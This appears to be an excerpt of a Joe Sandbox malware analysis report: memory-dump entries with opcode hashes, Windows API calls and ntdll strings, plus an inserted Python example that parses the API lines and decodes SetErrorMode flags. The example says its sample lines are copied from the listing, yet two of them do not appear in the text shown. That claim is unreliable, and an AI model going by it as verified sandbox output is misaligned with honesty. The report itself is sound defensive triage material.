                                                                • Opcode ID: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                • Instruction ID: 93cfc8bce6267aae08d781145535dcaa8a2315be78eb63b279de0f69f2d4756b
                                                                • Opcode Fuzzy Hash: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                                • Instruction Fuzzy Hash: A6F06D7A2D071437E320E695CC52FD7769CDF84B60F140019FB18AF2C1DAE5B49187A4
                                                                APIs
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03228290
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Path$NameName_
                                                                • String ID:
                                                                • API String ID: 3514427675-0
                                                                • Opcode ID: f3ad759f8a2e3c330957912baa94d0c0ea92c78bac11ffc54db39c128386f781
                                                                • Instruction ID: 5ec5364bad9922a81d57211f6693b132208741a86ae7371472cf8d7e68f29aed
                                                                • Opcode Fuzzy Hash: f3ad759f8a2e3c330957912baa94d0c0ea92c78bac11ffc54db39c128386f781
                                                                • Instruction Fuzzy Hash: 5AF030756002147BD710EE59DC40E9B77ACEFC8760F408008FA08A7241D670B8618BF4
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(03211969,?,03225DDF,03211969,032255FF,03225DDF,?,03211969,032255FF,00001000,?,?,00000000), ref: 0322964C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction ID: 9ec8e47e19d2b77799b17587bb0b9f9f9656e86fbedc6ca7de8bef3d44e1470f
                                                                • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction Fuzzy Hash: 70E06DB56003047FD610EE58DC41F9B37ACEF84710F004008F90CAB241D674B8548AB4
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D0A2AFD0,00000007,00000000,00000004,00000000,03213D3E,000000F4), ref: 0322969C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: 3b4fce26948114c184c2cf920acd22df12e0600c18a05f195a35435d7986f273
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: 49E065BA6103047BD610EE59DC44FAB37ACEF88750F004419F909AB282D7B0BD218BB4
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032144D2
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction ID: f3a7b4b1e8bc39cdabfa2e392d6a9deb2d3921dd30c65f291894787d5d903e5f
                                                                • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction Fuzzy Hash: 05F0A7B9E10109BBCB10DBD0DC41FADB7B49F14204F048185E50C9E280F671E755DB51
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 032182AC
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                • Instruction ID: 1d0656b354c4bfade72eac3172347d3e7bae3f4f7458a212f87e8b4eb157594d
                                                                • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                                • Instruction Fuzzy Hash: 68E0263922070827FB30EAB8DD81FA2739C9B48724F0C0660BD2CCB2C1E178F4A14190
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03211C70,03227F3E,032255FF,03211C36), ref: 032180A3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                • Instruction ID: 99330d0bdb2bdaf336364d437e71f316560d9c784bcbc42e3f4dbdcda9cef58e
                                                                • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                                • Instruction Fuzzy Hash: 1AE0C2356503087FFB20EBF4EC63FE5325C5B50350F044464B90CEB2C2EAB1B4A18665
                                                                APIs
                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03211C70,03227F3E,032255FF,03211C36), ref: 032180A3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3114749672.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3200000_fc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorMode
                                                                • String ID:
                                                                • API String ID: 2340568224-0
                                                                • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                • Instruction ID: 4974283e376a853145017d7a7b3774eb6950bfef79bba6063432e3d3d277effc
                                                                • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                                • Instruction Fuzzy Hash: B5D0A7753603083BF710F6E5DC16F56328C5B10754F044474BA0CFB2C2F9A6F0A041A9
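An added example, not Joe Sandbox output and not part of this report: a small Python parser for the "APIs" lines in the listing above (the `Name.MODULE(args), ref: addr` form), plus a decoder for the SetErrorMode flag word 00008003 recorded at 032180A3. The `SAMPLE` text is copied from the entries above; the `SEM_*` constants are the documented winbase.h values; the function names and the triage rule are this example's own.

```python
"""Parse Joe Sandbox 'APIs' entries into records and decode SetErrorMode flags.

Added example for this report (not Joe Sandbox code). SAMPLE is copied from
the API lines in the listing above; SEM_* values are from winbase.h.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Documented SetErrorMode flag values (winbase.h).
SEM_FLAGS = {
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}

# One API line as printed by the Joe Sandbox IDA plugin:
#   • CreateThread.KERNELBASE(00000000,...,-00000002,?,...), ref: 03209CE5
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: the four API lines are copied verbatim from the report.
SAMPLE = """\
• CreateProcessInternalW.KERNELBASE(?,?,?,?,0321823E,00000010,?,?,?,00000044,?,00000010,0321823E,?,?,?), ref: 03229753
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209CE5
• RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03228290
• SetErrorMode.KERNELBASE(00008003,?,?,03211C70,03227F3E,032255FF,03211C36), ref: 032180A3
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed '?' (unresolved)
    ref: int                   # address of the call site in the dump


def _parse_arg(tok: str) -> Optional[int]:
    """Hex argument as printed by the plugin; '?' means not recovered."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)  # handles the '-00000002' negative form as well


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every line matching the plugin's API format, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


def decode_sem(value: int) -> List[str]:
    """Expand a SetErrorMode flag word into its SEM_* names."""
    names = [n for bit, n in SEM_FLAGS.items() if value & bit]
    leftover = value & ~sum(SEM_FLAGS)
    if leftover:
        names.append(f"unknown:0x{leftover:x}")
    return names


def calls_by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group API names by the module they were resolved from."""
    out: Dict[str, List[str]] = {}
    for c in calls:
        out.setdefault(c.module, []).append(c.name)
    return out


def triage(calls: List[ApiCall]) -> List[str]:
    """Notes for calls whose first argument is worth a second look
    (this example's own rule: only SetErrorMode is decoded here)."""
    notes = []
    for c in calls:
        if c.name == "SetErrorMode" and c.args and c.args[0] is not None:
            notes.append(f"{c.ref:08X} SetErrorMode({c.args[0]:#x}) = "
                         + "|".join(decode_sem(c.args[0])))
    return notes


if __name__ == "__main__":
    for note in triage(parse_api_lines(SAMPLE)):
        print(note)
```

Running it on the copied lines decodes 0x8003 as SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX: the process asks Windows to suppress the critical-error, GP-fault and open-file dialog boxes, so a fault in the injected code terminates silently rather than leaving an error dialog on screen. Arguments printed as `?` are kept as `None` rather than guessed; the plugin only prints values it could recover.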
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                                • Instruction ID: 21704dffb9f327f28d602b929168d657cc32960343870785edf606786a471765
                                                                • Opcode Fuzzy Hash: 3577bcac1b610f00da618013f3d5f10ad78465acb55b0498b73e8668e526c9bd
                                                                • Instruction Fuzzy Hash: 94B09B719055C5C5EA11F760460CB17794867D1741F19C4A1D2430741F4779D1D1E275
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3128305681.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_3c10000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                • Instruction ID: 33ceb3adb63ba253fdb5a78e75ff725b80e3b19e1e3a74dee19d1dbf7d71c1ce
                                                                • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                                • Instruction Fuzzy Hash: CA9161F04082948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8915DB85
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                                • Instruction ID: 3f683ee95bb841d681bbd94a7617c6985ab16f3a7601c78e2f5a5c1fd4992e11
                                                                • Opcode Fuzzy Hash: f7c2625e97164449bc55be0d87662d557368db6c3d49dac5c72f948f5eaa4dca
                                                                • Instruction Fuzzy Hash: 8651D6F6A00256BFCB14DF98C99097EF7BCFB4A2407148AA9E4A5D7641D374DE40CBA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                                • Instruction ID: 59a4d2da6dacd6525301ddb14788c819f0979f4e425396a888117d662069a6a7
                                                                • Opcode Fuzzy Hash: e779a6ee78a2376fffb943de6f2678d2cc042fba4a66df01f06a6b24ddafa30b
                                                                • Instruction Fuzzy Hash: A4510875A04A55AECB30DF9CC89097FF7FDEB44240B088DA9E5D5DB641E7B4DA0087A0
                                                                Strings
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03964725
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039646FC
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03964655
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03964787
                                                                • ExecuteOptions, xrefs: 039646A0
                                                                • Execute=1, xrefs: 03964713
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03964742
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                                • Instruction ID: a33dfec2e5276b0dc6c4e6e15b7d280eb08007d883385ca49c6a40575bcb158f
                                                                • Opcode Fuzzy Hash: 0a592880bb858ecff337f0650639ce7fcb0bcb3a676ba9529a4af46c702171dc
                                                                • Instruction Fuzzy Hash: D9513735A017296ADF10FAE8DC89FAE7BACAF44340F0404E9D505FB186E7719A45CF51
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: a72e106f94263303c3b42572f1ad02e1f07d26af0b80d7a67bbfa83ea1f63550
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: DB021775518381AFD305CF68C890A6BBBE9EFC8740F08892DF9855B265DB31E905CB52
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction ID: 0466fad1c4cde100c0001cf5744769daee17a83935582127fd5cc290bd8c62f8
                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                • Instruction Fuzzy Hash: 2481FFF0E412499EDF24DE68C8917FEBBBAEF463A0F1C455AD862A7791C7308840CB51
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                                • Instruction ID: 8fe78f0c0fbaa791971238ea3408704cb6db34c01a9e721ca8faae3584fe6bb7
                                                                • Opcode Fuzzy Hash: 486779ff520e58babb001b75934e48c4dc0b2d947f7dda422ba096b0276b0792
                                                                • Instruction Fuzzy Hash: 7821517AE00619ABCB10DF69CC40AEFB7ECEF44684F080626E955E7200E734D9018BE1
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 0396031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039602E7
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039602BD
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                                • Instruction ID: 69948268721b64360fe9c2537abebb7dbe172a5968dbf9c812f78cf5ceffcc6c
                                                                • Opcode Fuzzy Hash: e2d2e8322bacb1ae74c2061c67167458e3bfa7bffcf38e2ea1968c6dadb1e9b4
                                                                • Instruction Fuzzy Hash: 9BE1DC716087499FD725DF28C884B2AB7E8BF84364F180A6DF4A69B3E0D774D854CB42
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 03967BAC
                                                                • RTL: Resource at %p, xrefs: 03967B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03967B7F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                                • Instruction ID: 9a86efa35f7d8a6b1d9f4ea71a919f66acf0f971e1f58efc6c2895e79c13591f
                                                                • Opcode Fuzzy Hash: 334793bfcd81e8b95e903cd449961e9ffbcafbc2b143e635b0ca9b0bb0106df4
                                                                • Instruction Fuzzy Hash: C5410435305B029FD724DE65CC40B6ABBE9EF88720F040A1DF95AEB680DB31E405CB91
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0396728C
                                                                Strings
                                                                • RTL: Re-Waiting, xrefs: 039672C1
                                                                • RTL: Resource at %p, xrefs: 039672A3
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03967294
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                                • Instruction ID: 053090d102bb98028789e08b7715854f6f5641fb9b8c4f4a6ded4627d216b525
                                                                • Opcode Fuzzy Hash: 13f6dad3ccde10ba80895fa730460d221f20aa60b6654cfb5990c89ee85a4292
                                                                • Instruction Fuzzy Hash: 3141EE36701716ABD720DE65CC81F6ABBE9FB84754F140A19F856EB280DB31F8428BD1
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                                • Instruction ID: ac3f5e5f32f72dafce18efb802809cd3a4c9574746768b8aecceb99705712495
                                                                • Opcode Fuzzy Hash: 8c036a5a934a0b3d389574d14803d7581a331c040192c70ff783327aa11f2477
                                                                • Instruction Fuzzy Hash: 4B314676A006299FCB20DF2DDC40BEEB7FCEF45654F454995E889E7240EF309A458BA0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000C.00000002.3127262474.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_38c0000_fc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 43403293434a17c0819d5470c098a2e89f7b82bb65c0ab6ba4026980d3be3f2b
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: AC9194F5E0021A9BDF24DFA9C8816FEB7B9FF467A0F18451AE865E72D0D73099408B50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.3127262474.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                                                                • Associated: 0000000C.00000002.3127262474.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
